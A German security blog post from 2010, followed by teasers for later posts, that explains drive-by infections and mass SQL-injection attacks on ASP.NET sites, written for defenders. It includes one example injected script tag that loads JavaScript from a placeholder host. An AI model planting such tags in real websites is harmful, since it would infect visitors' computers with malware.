Drive-by-Infektionen sind die zur Zeit wohl größte Bedrohung im
Web: In eigentlich vertrauenswürdige Websites eingeschleuste iframes
oder script-Tags versuchen, auf den Rechnern der Besucher
Schadsoftware einzuschleusen. Und auch außerhalb des Webs lauert
diese Gefahr: Cyberkriminelle können ihre Opfer über E-Mails
auf präparierte Seiten locken, wie es z.B. im Rahmen der "Operation
Aurora" genannten gezielten Angriffe auf Google und andere Unternehmen
eindrucksvoll vorgeführt wurde. Und Sophos
berichtet
über Spam-Mails, deren HTML-Anhänge außer dem Spam
zusätzlich einen unsichtbaren iframe zum Einschleusen von Schadcode
enthalten.
Donnerstag, 8. Juli 2010
Drive-by-Infektionen - Gefahren drohen überall
Im klassischen Fall der kompromittierten Websites erfolgt der Angriff in zwei Schritten: Zuerst wird eine normalerweise vertrauenswürdige Webseite so manipuliert, das sie bösartigen JavaScript-Code enthält. Danach wird von diesem JavaScript-Code in einem oder mehreren Schritten der eigentliche Schadcode auf dem Rechner des ahnungslosen Besuchers eingeschleust. Für diese Angriffe hat sich der Begriff Drive-by-Download oder Drive-by-Infektion eingebürgert, wobei ich den zweiten für passender halte - Drive-by-Download klingt zu harmlos.
Die Installation des Schadcodes erfolgt ohne Zutun des Benutzers, der i.A.
nicht einmal bemerkt, was da gerade passiert. In einem
script-Tag oder über einen iframe wird ein
JavaScript-Skript eingebunden, das dann versucht, über eine mehr oder
weniger großer Anzahl an Exploits zur Ausnutzung aktueller und auch
älterer Schwachstellen den Schadcode einzuschleusen. Ist dieser erste
Schadcode, der sog. Downloader, auf dem Rechner installiert, lädt er
weiteren Code nach, der verschiedenen Zwecken dienen kann. Vom
Ausspähen von Zugangsdaten bis zur Integration des Rechners in ein
Botnet
ist dann alles möglich. Manche Schädlinge laden bei
Bedarf auch weiteren Code nach, so dass ein ausspionierter Rechner
anschließend noch als Teil eines Botnets dienen kann.
Das erste Opfer: Der Webserver
Im Juni 2010 liefen laut Sucuri Security mindestens zwei groß angelegte SQL-Injection-Angriffe auf ASP.NET-Websites, die Code für Drive-by-Infektionen einschleusten. Das ist eigentlich nichts Neues, das gab es genau so auch schon 2008. Die SQL-Injection-Angriffe nutzen keine Schwachstellen in bestimmten Anwendungen oder Erweiterungen aus, sondern sind allgemein gegen alle ASP-Anwendungen gerichtet. Gibt es darin eine SQL-Injection-Schwachstelle, fällt sie dem Angriff zum Opfer. Sophos hat am 4. Juli über eine mögliche weitere Welle von SQL-Injection-Angriffen berichtet.
Der Klassiker: SQL-Injection
Die SQL-Injection-Angriffe folgen meist einem einheitlichen Muster: Alle
geeigneten Datenbankfelder werden mit iframes oder script-Tags
zum Nachladen von Schadcode gefüllt, in der Hoffnung, dass mindestens
eines der Felder ohne weitere Prüfung oder Bearbeitung ausgegeben
wird. Dabei werden Systemtabellen und z.B. rein numerische Felder
ignoriert und nur die einem normalen Benutzer gehörenden Tabellen und
darin die Felder mit Textwerten etc. manipuliert. Werden die Werte daraus
dann später unverändert an die Besucher der Website ausgegeben,
wird der eingeschleuste Code im Webbrowser der Benutzer ausgeführt
und JavaScript-Schadcode zum Ausnutzen verschiedener Schwachstellen
nachgeladen.
Wie viele Websites ungefähr Opfer einer Angriffswelle geworden sind,
verraten die Suchmaschinen: Da der iframe oder script-Tag in
alle passenden Felder eingeschleust wird, sind regelmäßig auch
welche dabei, die an Stellen ausgegeben werden, an denen diese Tags laut
HTML-Standard nicht vorgesehen sind und daher auch nicht ausgewertet
werden, z.B. innerhalb des title-Tags. Sucht man nach dem
eingeschleusten Code, z.B.
<script src=http://www.boeser-server.example/pfad/zum/skript.js></script>
werden die Seiten mit dem entsprechenden iframe oder
script-Tag ausgegeben.
Es gibt mehrere Tools, sog. Exploit-Kits, die von den Cyberkriminellen zur Vorbereitung und Durchführung derartiger Angriffe genutzt werden können. Dabei können sowohl die anzuwendenden Exploits als auch die anzugreifenden Websites komfortabel ausgewählt und die Angriffe konfiguriert werden. Danach muss der Kriminelle nur noch darauf warten, dass die verteilte Schadsoftware sich mit seinem Server verbindet. Die Manipulation der harmlosen Websites und die Angriffe auf deren Besucher laufen automatisch ab.
In der
nächsten Folge
werde ich einen SQL-Injection-Angriff zum Einschleusen eines iframes oder
script-Tags genauer beschreiben.
Übersicht über alle Artikel zum Thema
- Drive-by-Infektionen - Gefahren drohen überall
- Drive-by-Infektionen durch SQL-Injection vorbereitet
- Drive-by-Infektionen: So kommt der Schadcode auf den Server
- Drive-by-Infektionen - Vom Server auf den Client
- Drive-by-Infektionen - Ein Blick auf die Exploits
- Drive-by-Infektionen erkennen und abwehren
- LizaMoon - Massenhack mit minimalen Folgen
- Aktuelles: LizaMoon auf Apples iTunes-Seiten
Einen neuen Phishing-Ansatz hat Aza Raskin, der 'Creative Lead' für Firefox, beschrieben: Indem der Titel, der Inhalt und das Favicon eines gerade nicht im Fokus liegenden Browser-Tabs geändert werden, kann dem Benutzer darin eine vertra
Aufgenommen: Jul 22, 09:51
Schadsoftware, englisch "Malware", gibt es für viele verschiedene Zwecke. In diesen und den folgenden Texten geht es auf eine kleine Rundreise durch die Welt der Schadsoftware. Den Anfang macht die sog. "Scareware": Schadsoftware, die zwar vie
Aufgenommen: Nov 04, 10:51
Zwischen dem 26. Oktober und 4. November wurden 4 0-Day-Exploits entdeckt. Eine der Schwachstellen wurde bereits vollständig und eine in der bisher nicht angegriffenen Komponente behoben. Wenn das so weiter geht, wird es ein ziemlicher hei&s
Aufgenommen: Nov 08, 07:32
2010 war ein gerade aus Sicht der IT-Sicherheit ereignisreiches Jahr. 2011 kann es gerne ruhiger zugehen, aber vermutlich gilt wie immer die Regel von Bernd dem Brot: "Alles ist wie immer, nur schlimmer! Einige Beispiele: So hat z.B. das Bund
Aufgenommen: Jan 03, 09:14
Mitte März meldete RSA einen gezielten Angriff, bei dem nicht näher beschriebene Daten ausgespäht wurden. Darunter befanden sich auch Informationen über die SecurID-Token zur Zwei-Faktor-Authentifizierung. Ebenfalls Mitte M&aum
Aufgenommen: Apr 11, 11:46
Microsoft veröffentlicht am Dienstag seine Patches, und die Cyberkriminellen am Mittwoch oder Donnerstag die Exploits für die soeben behobenen Schwachstellen - vor einigen Jahren war das fast üblich. Jetzt ist es wohl wieder soweit
Aufgenommen: Jun 20, 09:35
Ist Ihre Website sicher? Sind Sie sich da wirklich ganz sicher? Wenn nicht, ist jetzt eine gute Gelegenheit, Server und Anwendungen auf Schwachstellen zu testen. Bevor es andere tun und Sie womöglich erst aus der Presse erfahren, dass Ihre ei
Aufgenommen: Jul 11, 10:29
Für gut eine Woche waren alle iPhone-Besitzer der akuten Gefahr einer Drive-by-Infektion durch Ausnutzung mehrerer 0-Day-Schwachstellen ausgesetzt - und dass nur, damit einige iPhone-Besitzer (und die von anderen iOS-Geräten) ihr Ger&aum
Aufgenommen: Jul 18, 10:50
Vor etwas mehr als einem Jahr wurde festgestellt, dass Facebooks Like-Button zum Clickjacking geradezu auffordert. Diese speziellen Angriffe wurden "Likejacking" getauft, und in der Zwischenzeit gab es eine Vielzahl davon. Likejacking - Cybe
Aufgenommen: Aug 18, 06:47
Cyberkriminelle und Banken liefern sich zur Zeit wohl ein Rennen wie Hase und Igel. Die Frage ist nur, wer Hase und wer Igel ist und ob der Hase am Ende wirklich tot umfällt. TAN-Listen tot, SMS-TAN angeschlagen Die herkömmliche
Aufgenommen: Aug 22, 08:57
Die Banken schaffen die iTAN ab, weil es (zu viele) Kunden gibt, die das Opfer von Man-in-the-Browser-Angriffen werden oder auf Phisher hereinfallen. Möchte jemand wetten, dass genau diese Kunden sich nicht stattdessen genauso einfach einen Sma
Aufgenommen: Sep 19, 09:37
Heise Security hat festgestellt, dass einige Virenscanner bei der Erkennung eines minimal manipulierten Staatstrojaners versagen und die Erkennungsleistung auch sonst zu wünschen übrig lässt. Wundert das irgend jemanden? Virensc
Aufgenommen: Okt 17, 11:29
Wiederholungen, nichts als Wiederholungen. Nein, ich meine nicht das TV-Programm im Sommer(loch). Auch die Cyberkriminellen haben in letzter Zeit auf Bewährtes gesetzt: Clickjacking gegen Flash, Massen-SQL-Injection und Code-Recycling sind ang
Aufgenommen: Okt 24, 07:51
Microsoft hat ein Security Advisory zur von Duqu ausgenutzten 0-Day-Schwachstelle im Kernel veröffentlicht. Gefährliche oder weniger gefährliche Schwachstelle? Die Schwachstelle mit der CVE-ID CVE-2011-3402 befindet sich i
Aufgenommen: Nov 07, 07:27
SQL-Injection-Angriffe auf ASP-Websites gibt es eigentlich ständig, meist ohne dass sie besondere Aufmerksamkeit erregen. Von Zeit zu Zeit gibt es auch größere Wellen, wie z.B. LizaMoon im Frühjahr 2011. Auch im Herbst 2011
Aufgenommen: Jan 09, 10:41
Das Bundesamt für Sicherheit in der Informationstechnik (BSI) empfiehlt allen Internetnutzern, ihre Rechner auf eine Infektion mit der Schadsoftware "DNS-Changer" zu überprüfen und nennt auch eine Website, auf der das online erledigt
Aufgenommen: Jan 12, 11:53
Zwei Berichten zu Folge wird (relativ) massiv über kompromittierte Wordpress-3.2.1-Installationen ein Exploit-Kit verbreitet. Darüber, wie die Wordpress-Installationen kompromittiert werden, herrscht Unklarheit. Zumindest gibt es zwei E
Aufgenommen: Feb 02, 10:32
Aufgenommen: Feb 14, 13:40
Das Motto der CeBIT 2012: Managing Trust. Na, dann wird ja alles ganz sicher. Vor allem in der Cloud - man muss nur Vertrauen haben! Was stören einen dann schon mögliche Angriffe oder Schwachstellen? Oder der mögliche Zugriff durch
Aufgenommen: Mär 08, 06:46
Mac OS X wird immer beliebter. Auch bei den Cyberkriminellen. Und dann gibt es da wohl auch noch mindestens einen Staat, der es auf Mac-Benutzer abgesehen hat. Aber fangen wir mit den normalen Cyberkriminellen an. Flashback - Erstinfektion ohn
Aufgenommen: Mär 26, 10:15
Es ist mal wieder Zeit, einen Blick auf die verschiedenen Botnets zu werfen. Denen geht es zur Zeit an den Kragen. Zumindest einigen, und zumindest teilweise. Microsoft gegen Zeus-Botnets Microsofts "Digital Crimes Unit" hat gemeinsam mit
Aufgenommen: Mär 29, 10:03
Der Mac wird bei den Cyberkriminellen immer beliebter, und inzwischen haben sie ca. 1% aller Macs in einem Botnet versammelt. Wirklich? Und was macht Apple dagegen? Das Flashback-Botnet - 550.000, 600.000, wer bietet mehr? Es gibt ein r
Aufgenommen: Apr 10, 10:26
Es ist an der Zeit, mal mit einige Mythen rund um den Mac, Schadsoftware und das Flashback-Botnet aufzuräumen. Wenn man sich die verschiedenen Mac-Foren ansieht, liest man immer wieder die gleichen, falschen Aussagen. Da ich weder Lust noch Zei
Aufgenommen: Apr 16, 10:58
Nachdem geklärt ist, was ein APT ist, wollen wir jetzt einen Blick auf den Ablauf so eines Angriffs richten. Als erstes Beispiel dient der Angriff, der den Begriff "Advanced Persistent Threat" im Januar 2010 bekannt gemacht hat: Operation
Aufgenommen: Apr 19, 12:14
Es gibt noch ein paar Neuigkeiten zu Flashback und anderen, die gleiche Schwachstelle ausnutzenden Schädlingen. Und wussten Sie schon, dass Flashback über WordPress-Installationen verbreitet wurde und noch wird? Abweichungen bei der
Aufgenommen: Apr 23, 09:43
Heute gibt es mal wieder ein Sammelsurium an Kommentaren zu verschiedenen Themen, die aber alle eins miteinander verbindet: Sie haben etwas mit Schadsoftware auf dem Mac zu tun, zumindest indirekt. Windows-Schädlinge auf Macs Sophos b
Aufgenommen: Apr 30, 10:33
Heute geht es um verschiedene Reaktionen, die aber alle in der einen oder anderen Form etwas mit IT-Sicherheit zu tun haben. Hase und Igel bei Drive-by-Infektion Am 23. April wurde ich auf eine neue Drive-by-Infektion aufmerksam gemacht un
Aufgenommen: Mai 07, 20:19
Die "Operation Aurora", Stuxnet und der Angriff auf RSA - drei bekannte Advanced Persistent Threats und zwei entscheidende Fragen: Kann man solche Angriffe erkennen, und wenn ja: Wie? Der eigentliche Angriff Fangen wir mit dem eigentlic
Aufgenommen: Mai 10, 14:25
Man nehme einige SQL-Injection-Massenhacks, eine Prise Drive-by-Infektionen und zwei Exploit-Kits, würze mit einigen Kommentaren, rühre gut um - und schon ist dieser Standpunkt fertig. Lizamoon weiterhin aktiv Vor etwas mehr als
Aufgenommen: Mai 14, 07:37
Zur Zeit laufen Angriffe über zwei Schwachstellen in Microsoft-Programmen, die beide die Ausführung von eingeschleustem Code erlauben: Eine 0-Day-Schwachstelle in den XML Core Services und eine am Juni-Patchday gepatchte Schwachstelle im In
Aufgenommen: Jun 21, 11:52
Zum Abschluss des Themas Advanced Persistent Threats gibt es in dieser Folge noch ein paar Informationen, die in die anderen Texte nicht passten oder nach deren Veröffentlichung erschienen sind. Als Beispiel dafür, dass nicht nur Unterneh
Aufgenommen: Jul 05, 11:18
Was Google Hacking ist, haben Sie in der vorherigen Folge erfahren, in der auch erste Beispiele und die wichtigsten Google-Optionen vorgestellt wurden. Schon damit kann man viele interessante Informationen sammeln, aber mit entsprechenden Anpassu
Aufgenommen: Jul 26, 11:52
Laut dem Cloud-Hosting-Anbieter FireHost ist die Zahl der erkannten SQL-Injection-Angriffe zwischen April und Juni 2012 um 69% gestiegen. Während im 1. Quartal 2012 "nur" 277.770 Angriffe abgewehrt wurden, waren es im 2. Quartal 469.983 Angr
Aufgenommen: Aug 02, 09:08
Auch heute gibt es "nur" Kurzkommentare zu jeder Menge Links. Los geht es mit bösartiger Google-Werbung. Oder wie sonst soll man Anzeigen bezeichnen, die wie ein Download-Button aussehen und auf Download-Seiten eingeblendet werden? Google, yo
Aufgenommen: Aug 27, 06:55
Zur Zeit gibt es zwei 0-Day-Schwachstellen in Java, ein Exploit befindet sich bereits im Exploit-Kit "Black Hole", und Angriffe darüber wurden auch schon gemeldet. Falls Sie das Java-Plug-In ihres Browsers noch nicht deaktiviert haben, wird
Aufgenommen: Aug 30, 09:13
Seit einigen Tagen wird eine 0-Day-Schwachstelle im Internet Explorer im Rahmen von Drive-by-Infektionen ausgenutzt. Microsoft hat soeben die sofortige Veröffentlichung eines FixIt-Tools sowie die Veröffentlichung eines Updates
Aufgenommen: Sep 20, 00:43
Es gibt Neues zu Flame, ein neuer Wurm macht den Nahen Osten unsicher, ein Exploit-Kit scheint sich auf Java zu spezialisieren, und ein Rootkit verbreitet Drive-by-Infektionen. Das ist doch ein paar Kommentare wert. Neues zu Flame Sie erinn
Aufgenommen: Nov 26, 08:11
Eran Kalige von Versafe und Darrell Burkey von Check Point Software Technologies haben eine Fallstudie zu einem groß angelegten Angriff auf Onlinebanking-Nutzer veröffentlicht: "A Case Study of Eurograbber: How 36 Million Euros was Stolen
Aufgenommen: Dez 10, 09:47
Wie bereits erwähnt lehnt sich diese kleine Serie zur Sicherheit von HTML5 an meinen Vortrag auf der WebTech Conference 2012 an. Womit auch schon das aktuelle Thema vorgegeben ist: Die mit HTML5 eingeführte Methode postMessage().
Aufgenommen: Dez 20, 08:37
Ende Dezember wurden Angriffe über eine neue 0-Day-Schwachstelle im Internet Explorer entdeckt. Und die hat es ebenso wie die Angriffe selbst in sich. Erste Angriffe am 27. 21. 7 Dezember 2012 Laut Symantec und FireEye konnten die er
Aufgenommen: Jan 07, 11:35
In der neuen Kategorie "Drucksache" werde ich in Zukunft auf Texte von mir hinweisen, die in Magazinen etc. erschienen sind. Los geht es mit der Windows.Developer Ausgabe 2.2013. Darin ist ein Artikel über SQL Injection (nicht nur) in
Aufgenommen: Jan 10, 17:19
Mein Artikel im PHP Magazin 2.2013 beschäftigt sich mit den auch hier im Blog schon behandelten Drive-by-Infektionen. Da der Artikel im PHP Magazin erschienen ist, liegt der Schwerpunkt natürlich auf PHP. Konkret erkläre ich am B
Aufgenommen: Jan 10, 17:20
Es gibt mal wieder eine 0-Day-Schwachstelle in Java. Oder besser: Es gab sie. Denn sie wurde von Oracle bereits geschlossen - nach nur 3 Tagen! Kommen wir also zu einem Drama in 4 AktenTagen: 10. Januar: Exploit "in the wild" und vielen Ex
Aufgenommen: Jan 14, 00:48
Beim diesjährigen Pwn2Own-Wettbewerb auf der Sicherheitskonferenz CanSecWest wurde mit Ausnahme von Apples Safari alles gehackt, was zur Verfügung stand. Und ob Safari nun allen Angriffen widerstanden hat oder ob niemand Lust hatte, s
Aufgenommen: Mär 11, 12:54
Java im Browser ist gefährlich. Darum sollte man es ausschalten, wenn man es nicht braucht. Denn was nicht aus dem Browser heraus erreichbar ist, kann auch nicht über eine Drive-by-Infektion angegriffen werden. Im Fall von Mac OS X
Aufgenommen: Mär 18, 09:07
Im Windows.Developer 4.2013 ist ein Artikel über die Sicherheit von Tablets erschienen. Vorgestellt werden die bisher bekannten theoretischen und praktischen Angriffe. Bisher gibt es von beiden zwar erst wenige, aber da die Tablets immer mehr
Aufgenommen: Mär 18, 12:07
Die Themen heute: PostgreSQL ergreift vor der Veröffentlichung eines Sicherheitsupdates eine zweifelhafte Schutzmaßnahme, Ad-Blocker können vor Drive-by-Infektionen schützen, und AT&T verwendet unsichere Passwortregeln. Au&s
Aufgenommen: Apr 08, 14:21
Oracles Antwort auf Javas ständige Sicherheitsprobleme: Der Einsatz von Code Signing. Vorerst gibt es nur mehr oder weniger ausführliche Warnungen vor nicht oder falsch signierten Applets, irgendwann sollen dann nur noch signierte Apple
Aufgenommen: Apr 18, 17:29